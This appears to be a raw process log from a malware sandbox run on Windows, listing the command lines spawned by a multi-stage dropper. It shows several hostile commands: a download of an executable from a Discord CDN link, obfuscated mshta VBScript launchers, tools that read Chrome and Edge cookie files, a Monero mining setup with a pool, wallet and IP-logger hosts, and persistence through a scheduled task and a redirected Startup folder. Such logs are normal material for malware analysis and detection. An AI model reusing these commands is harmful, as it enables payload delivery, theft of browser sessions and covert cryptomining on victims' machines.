C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 276
C:\Users\Admin\AppData\Roaming\5335236.exe
"C:\Users\Admin\AppData\Roaming\5335236.exe"
C:\Users\Admin\AppData\Roaming\4750957.exe
"C:\Users\Admin\AppData\Roaming\4750957.exe"
C:\Users\Admin\AppData\Roaming\2857716.exe
"C:\Users\Admin\AppData\Roaming\2857716.exe"
C:\Users\Admin\AppData\Roaming\1156460.exe
"C:\Users\Admin\AppData\Roaming\1156460.exe"
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
"C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
"C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe"
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
"C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe"
C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe
"C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
"C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe"
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
"C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe"
C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe
"C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
"C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe"
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
"C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe"
C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe
"C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe"
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
"C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 1436 -ip 1436
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 460
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4032 -ip 4032
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2376 -ip 2376
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 276
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\19780\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\B924.tmp\B925.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 664 -ip 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 960 -ip 960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1020 -ip 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 296
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 280
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 292
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "mUtXfmRxIl2lXYs36EcxefSC.exe" -f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\8473.exe
C:\Users\Admin\AppData\Local\Temp\8473.exe
C:\Users\Admin\AppData\Local\Temp\8908.exe
C:\Users\Admin\AppData\Local\Temp\8908.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4160 -ip 4160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 272
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 604 -p 1104 -ip 1104
C:\Users\Admin\AppData\Local\Temp\8F33.exe
C:\Users\Admin\AppData\Local\Temp\8F33.exe
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Users\Admin\AppData\Local\Temp\9232.exe
C:\Users\Admin\AppData\Local\Temp\9232.exe
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\AppData\Local\Temp\is-STBT5.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-STBT5.tmp\Stats.tmp" /SL5="$20424,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-AH8GQ.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AH8GQ.tmp\Inlog.tmp" /SL5="$104D8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5080 -ip 5080
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1104 -s 2360
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\is-UVG66.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UVG66.tmp\MediaBurner2.tmp" /SL5="$1054C,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-84UOG.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-84UOG.tmp\VPN.tmp" /SL5="$1054E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-EITQ1.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EITQ1.tmp\WEATHER Manager.tmp" /SL5="$104FA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 280
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\B25D.exe
C:\Users\Admin\AppData\Local\Temp\B25D.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1504 -ip 1504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 2464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5456 -ip 5456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5360 -ip 5360
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 292
C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 292
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\1163862.exe
"C:\Users\Admin\AppData\Roaming\1163862.exe"
C:\Users\Admin\Documents\u9pzYiYnNByA7uyFsDrbpZcm.exe
"C:\Users\Admin\Documents\u9pzYiYnNByA7uyFsDrbpZcm.exe"
C:\Users\Admin\Documents\kNQQghA2b3_W8RSpEJCcChiB.exe
"C:\Users\Admin\Documents\kNQQghA2b3_W8RSpEJCcChiB.exe"
C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe
"C:\Users\Admin\Documents\1GqRz4au4F7OMlGdOGv7CJii.exe"
C:\Users\Admin\Documents\t4Bibx0tsFI28lCf0xjwp2NJ.exe
"C:\Users\Admin\Documents\t4Bibx0tsFI28lCf0xjwp2NJ.exe"
C:\Users\Admin\Documents\PKFhIMCZ9GGRnPOxrRcJeYLY.exe
"C:\Users\Admin\Documents\PKFhIMCZ9GGRnPOxrRcJeYLY.exe"
C:\Users\Admin\Documents\3Kdfkj8UDAPgDKWVyo_q162q.exe
"C:\Users\Admin\Documents\3Kdfkj8UDAPgDKWVyo_q162q.exe"
C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe
"C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe"
C:\Users\Admin\Documents\ViPPIwqv5bR0VGFmRSnZKqzN.exe
"C:\Users\Admin\Documents\ViPPIwqv5bR0VGFmRSnZKqzN.exe"
C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe
"C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe"
C:\Users\Admin\Documents\ILPujEdd9AGKq8RnK1t7kXBH.exe
"C:\Users\Admin\Documents\ILPujEdd9AGKq8RnK1t7kXBH.exe"
C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe
"C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe"
C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe
"C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe"
C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe
"C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe"
C:\Users\Admin\Documents\2HuEPZ58JHXyBF7DWrWix9G2.exe
"C:\Users\Admin\Documents\2HuEPZ58JHXyBF7DWrWix9G2.exe"
C:\Users\Admin\Documents\pzDHieIzjbxQQjMZ7ZFhFq7V.exe
"C:\Users\Admin\Documents\pzDHieIzjbxQQjMZ7ZFhFq7V.exe"
C:\Users\Admin\Documents\JZ4tbm9sZUxokPICPPwvXT5a.exe
"C:\Users\Admin\Documents\JZ4tbm9sZUxokPICPPwvXT5a.exe"
C:\Users\Admin\Documents\jmrqfuQetT5ED7vcJtdy9yMs.exe
"C:\Users\Admin\Documents\jmrqfuQetT5ED7vcJtdy9yMs.exe"
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Users\Admin\Documents\IDtuV35ejCiXUBTegysCPyO1.exe
"C:\Users\Admin\Documents\IDtuV35ejCiXUBTegysCPyO1.exe"
C:\Users\Admin\Documents\5zeJwRz7QimEmqn0U8Bnk2U8.exe
"C:\Users\Admin\Documents\5zeJwRz7QimEmqn0U8Bnk2U8.exe"
C:\Users\Admin\Documents\8NeXgZJaHG8mqRtp9L5v4__F.exe
"C:\Users\Admin\Documents\8NeXgZJaHG8mqRtp9L5v4__F.exe"
C:\Users\Admin\AppData\Roaming\6024070.exe
"C:\Users\Admin\AppData\Roaming\6024070.exe"
C:\Users\Admin\AppData\Roaming\4244192.exe
"C:\Users\Admin\AppData\Roaming\4244192.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\MkTiRwY2wvRaMYM0PQRYOaLo.exe
"C:\Users\Admin\Documents\MkTiRwY2wvRaMYM0PQRYOaLo.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FEA4.tmp\FEA5.tmp\FEA6.bat C:\Users\Admin\Documents\3Kdfkj8UDAPgDKWVyo_q162q.exe"
C:\Users\Admin\Documents\EVdlu6Z3VCvMuTveC1gU8W1X.exe
"C:\Users\Admin\Documents\EVdlu6Z3VCvMuTveC1gU8W1X.exe"
C:\Users\Admin\AppData\Roaming\5030033.exe
"C:\Users\Admin\AppData\Roaming\5030033.exe"
C:\Users\Admin\AppData\Local\Temp\FFA3.exe
C:\Users\Admin\AppData\Local\Temp\FFA3.exe
C:\Users\Admin\AppData\Roaming\3494345.exe
"C:\Users\Admin\AppData\Roaming\3494345.exe"
C:\Users\Admin\AppData\Local\Temp\is-8PGGC.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-8PGGC.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Users\Admin\AppData\Local\Temp\is-Q4D1Q.tmp\EVdlu6Z3VCvMuTveC1gU8W1X.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q4D1Q.tmp\EVdlu6Z3VCvMuTveC1gU8W1X.tmp" /SL5="$20368,138429,56832,C:\Users\Admin\Documents\EVdlu6Z3VCvMuTveC1gU8W1X.exe"
C:\Users\Admin\AppData\Local\Temp\tmpCD82_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpCD82_tmp.exe"
C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe
"C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2856 -ip 2856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7204 -ip 7204
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 276
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\jZGfREbYpGe8op_zj1MF9p7K.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6592 -ip 6592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 280
C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe
"C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Documents\MkTiRwY2wvRaMYM0PQRYOaLo.exe
"C:\Users\Admin\Documents\MkTiRwY2wvRaMYM0PQRYOaLo.exe" -q
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 316
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2204 -ip 2204
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Documents\8NeXgZJaHG8mqRtp9L5v4__F.exe
C:\Users\Admin\Documents\8NeXgZJaHG8mqRtp9L5v4__F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7628 -ip 7628
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 6240 -ip 6240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 588
C:\Users\Admin\AppData\Local\Temp\is-GMVR4.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-GMVR4.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 876
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7196 -ip 7196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6764 -ip 6764
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\is-DC6PO.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-DC6PO.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 280
C:\Users\Admin\AppData\Roaming\7265684.exe
"C:\Users\Admin\AppData\Roaming\7265684.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4304 -ip 4304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7196 -s 460
C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp" /SL5="$3061E,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-DC6PO.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\6707195.exe
"C:\Users\Admin\AppData\Roaming\6707195.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "jZGfREbYpGe8op_zj1MF9p7K.exe" -f
C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp" /SL5="$2071E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-GMVR4.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Roaming\5249501.exe
"C:\Users\Admin\AppData\Roaming\5249501.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Users\Admin\Documents\3n__NyDwZWJFxhviTuq327Cf.exe
"C:\Users\Admin\Documents\3n__NyDwZWJFxhviTuq327Cf.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\8329830.exe
"C:\Users\Admin\AppData\Roaming\8329830.exe"
